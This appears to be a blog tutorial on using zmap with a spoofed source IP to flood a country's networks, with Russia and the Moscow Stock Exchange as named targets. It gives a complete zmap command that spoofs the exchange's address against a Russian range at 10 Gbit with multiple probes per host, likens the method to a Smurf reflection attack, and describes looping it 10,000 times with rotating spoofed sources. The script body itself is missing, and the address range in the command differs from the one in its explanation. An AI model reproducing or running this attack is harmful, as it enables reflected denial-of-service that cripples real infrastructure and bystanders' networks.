top of page
Writer's picturealvin gitonga

šŸ˜ˆ Saturate and DoS any Country's Internet with zmap šŸ˜²

Updated: Oct 2, 2022

CyberMorans,

As many of you know, zmap is a powerful scanning tool that is capable of scanning the entire Internet in 45 minutes šŸ˜µ

What makes this tool different is its ability to send scans to millions of systems simultaneously šŸ˜². In this post and tutorial, we will use Russia as an example but this can work for any country. Why Russia?....well, because Russia!


so lets get to it warriors...šŸ˜‹


Ā 

Step 1: Download and Install zmap

First, this technique requires that you have an installation of Linux. I prefer Kali LinuxšŸ‘‡

sudo apt install zmap

Step 2: Select a Target Range and Source IP

Normally, when we use a scanner, we want the response packets to be sent back to our IP. Not in this case. We don't care what the response is, we just want to DoS the target system šŸ˜


In addition, if we spoof our IP address, we can have the responses from a large number of systems returning to another system in Russia further crippling that system or any other target country šŸ˜ˆ


For example, I could send out packets to a list of Russian IP addresses and spoof the IP address using the Moscow Stock Exchange IP. The packets will go out to all the IP addresses on my list and they will all respond to the Moscow Stock Exchange server. This could be thousands or millions of systems. This is very similar to the Smurf attack. We can up the ante by using multiple threads to send the packets and send multiple packets to each system šŸ‘‡

To build our command, it will look like this šŸ‘‡

sudo zmap -i eth1 -S 85.118.181.8 -B 10G -p 80 -T 10 -P 10 95.81.0.0/16

Where šŸ‘†:

sudo gives the command root privileges

zmap is the scanner command

-i eth1 designates the interface (default is eth0)

-S 85.118.181.8 is the spoofed IP address of the sender (in this case, the Moscow Stock Exchange)

-B 10G is the bandwidth to use (10 Gigabit in this case)

-p 80 is the port to scan (use 80 or 443)

-T 10 the number of threads to use (default is 1)

-P 10 is the number of probes to send to each host (default is 1)

95.81.192.0/24 the destination IP address(es)


To run continuously, we can create a simple script that runs it 10,000 times with a 5s rest between each execution šŸ˜µ. Open a text editor such as nano and enter the following commands šŸ‘‡

Save the script with a name such as zmapDoS.sh. We need to change the permissions to enable us to execute it.

sudo chmod 755 zmapDoS.sh 

Run the script, to get this output šŸ‘‡

sudo ./zmapDoS.sh

For optimal effect, use a different spoofed IP address in the target country as the source (-S) šŸ˜‹

Ā 

Conclusion

Subscribe to receive notifications of similar posts šŸ˜‹ where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...šŸ˜‹


Morans,


Thank you for your time, Like and leave a comment/review and as always, stay awesome! šŸ˜‹šŸ‘Š šŸ’Ŗ

35 views0 comments

Recent Posts

See All

Comments


Post: Blog2_Post
bottom of page